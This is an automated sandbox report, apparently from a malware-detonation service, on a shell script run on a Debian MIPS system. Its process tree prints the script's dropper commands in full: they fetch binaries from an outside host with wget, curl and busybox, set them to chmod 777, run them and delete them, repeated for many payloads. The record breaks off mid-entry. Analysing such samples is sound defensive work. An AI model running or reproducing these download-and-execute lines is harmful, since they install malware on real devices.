Analysis Overview
SHA256
fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f
Threat Level: Shows suspicious behavior
The file fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-21 01:58
Signatures
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-21 01:58
Reported
2024-10-21 02:01
Platform
debian9-mipsbe-20240418-en
Max time kernel
77s
Max time network
75s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg | /tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg | N/A |
| N/A | /tmp/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2 | /tmp/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2 | N/A |
| N/A | /tmp/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5 | /tmp/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5 | N/A |
| N/A | /tmp/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb | /tmp/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb | N/A |
| N/A | /tmp/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8 | /tmp/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8 | N/A |
| N/A | /tmp/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q | /tmp/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q | N/A |
| N/A | /tmp/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL | /tmp/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL | N/A |
| N/A | /tmp/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz | /tmp/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz | N/A |
| N/A | /tmp/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8 | /tmp/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8 | N/A |
| N/A | /tmp/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q | /tmp/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q | N/A |
| N/A | /tmp/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh | /tmp/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh | N/A |
| N/A | /tmp/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ | /tmp/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ | N/A |
| N/A | /tmp/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3 | /tmp/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3 | N/A |
| N/A | /tmp/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza | /tmp/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza | N/A |
| N/A | /tmp/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz | /tmp/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz | N/A |
| N/A | /tmp/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8 | /tmp/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8 | N/A |
| N/A | /tmp/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q | /tmp/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q | N/A |
| N/A | /tmp/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh | /tmp/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh | N/A |
| N/A | /tmp/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ | /tmp/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ | N/A |
| N/A | /tmp/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3 | /tmp/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3 | N/A |
| N/A | /tmp/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza | /tmp/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza | N/A |
| N/A | /tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg | /tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg | N/A |
| N/A | /tmp/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2 | /tmp/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2 | N/A |
| N/A | /tmp/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5 | /tmp/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5 | N/A |
| N/A | /tmp/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb | /tmp/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb | N/A |
| N/A | /tmp/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8 | /tmp/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8 | N/A |
| N/A | /tmp/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q | /tmp/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q | N/A |
| N/A | /tmp/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL | /tmp/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb | /usr/bin/curl | N/A |
| File opened for modification | /tmp/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg | /usr/bin/curl | N/A |
| File opened for modification | /tmp/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg | /usr/bin/curl | N/A |
| File opened for modification | /tmp/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL | /usr/bin/curl | N/A |
| File opened for modification | /tmp/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza | /usr/bin/curl | N/A |
| File opened for modification | /tmp/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q | /usr/bin/curl | N/A |
Processes
/tmp/fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f.sh
[/tmp/fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]
/bin/chmod
[chmod 777 Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]
/tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg
[./Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]
/bin/rm
[rm Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]
/bin/chmod
[chmod 777 aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]
/tmp/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2
[./aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]
/bin/rm
[rm aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]
/bin/chmod
[chmod 777 eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]
/tmp/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5
[./eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]
/bin/rm
[rm eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]
/bin/chmod
[chmod 777 WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]
/tmp/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb
[./WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]
/bin/rm
[rm WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]
/bin/chmod
[chmod 777 f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]
/tmp/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8
[./f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]
/bin/rm
[rm f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]
/bin/chmod
[chmod 777 izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]
/tmp/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q
[./izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]
/bin/rm
[rm izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]
/bin/chmod
[chmod 777 fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]
/tmp/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL
[./fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]
/bin/rm
[rm fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]
/bin/chmod
[chmod 777 cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]
/tmp/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz
[./cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]
/bin/rm
[rm cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]
/bin/chmod
[chmod 777 s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]
/tmp/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8
[./s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]
/bin/rm
[rm s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]
/bin/chmod
[chmod 777 lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]
/tmp/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q
[./lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]
/bin/rm
[rm lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]
/bin/chmod
[chmod 777 WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]
/tmp/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh
[./WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]
/bin/rm
[rm WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]
/bin/chmod
[chmod 777 Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]
/tmp/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ
[./Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]
/bin/rm
[rm Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]
/bin/chmod
[chmod 777 lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]
/tmp/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3
[./lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]
/bin/rm
[rm lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]
/bin/chmod
[chmod 777 oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]
/tmp/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza
[./oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]
/bin/rm
[rm oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]
/bin/chmod
[chmod 777 cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]
/tmp/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz
[./cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]
/bin/rm
[rm cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]
/bin/chmod
[chmod 777 s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]
/tmp/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8
[./s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]
/bin/rm
[rm s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]
/bin/chmod
[chmod 777 lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]
/tmp/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q
[./lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]
/bin/rm
[rm lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]
/bin/chmod
[chmod 777 WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]
/tmp/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh
[./WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]
/bin/rm
[rm WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]
/bin/busybox
